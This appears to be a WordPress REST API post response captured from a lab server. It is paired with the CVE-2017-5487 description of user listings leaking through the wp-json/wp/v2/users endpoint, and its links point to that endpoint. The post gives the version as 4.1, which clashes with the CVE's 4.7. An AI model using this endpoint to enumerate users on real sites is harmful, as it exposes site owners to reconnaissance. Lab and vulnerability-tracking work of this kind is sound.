  "link": "http://192.168.177.177/wordpress/index.php/2020/08/06/hello-world/",
  "title": {
    "raw": "Hello World CVE-2017-5487",
    "rendered": "Hello World CVE-2017-5487"
  },
  "content": {
    "raw": "Vulnrerability in Wordpress version 4.1",
    "rendered": "<p>Vulnrerability in WordPress version 4.1</p>\n",
    "protected": false
  },
  "excerpt": {
    "raw": "",
    "rendered": "<p>Vulnrerability in WordPress version 4.1</p>\n",
    "protected": false
  },
  "author": 1,
  "featured_media": 0,
  "comment_status": "open",
  "ping_status": "open",
  "sticky": false,
  "template": "",
  "format": "standard",
  "meta": [],
  "categories": [
    1
  ],
  "tags": [],
  "_links": {
    "self": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1"
      }
    ],
    "collection": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts"
      }
    ],
    "about": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/types/post"
      }
    ],
    "author": [
      {
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/users/1"
      }
    ],
    "replies": [
      {
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/comments?post=1"
      }
    ],
    "version-history": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/revisions"
      }
    ],
    "wp:attachment": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/media?parent=1"
      }
    ],
    "wp:term": [
      {
        "taxonomy": "category",
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/categories?post=1"
      },
      {
        "taxonomy": "post_tag",
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/tags?post=1"
      }
    ],
    "curies": [
      {
        "name": "wp",
        "href": "https://api.w.org/{rel}",
        "templated": true
      }
    ]
  }
}
Vulnerability
CVE Description
┃ wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress
┃ 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to
┃ obtain sensitive information via a wp-json/wp/v2/users request.
Affect Software Version(CPE)
● cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*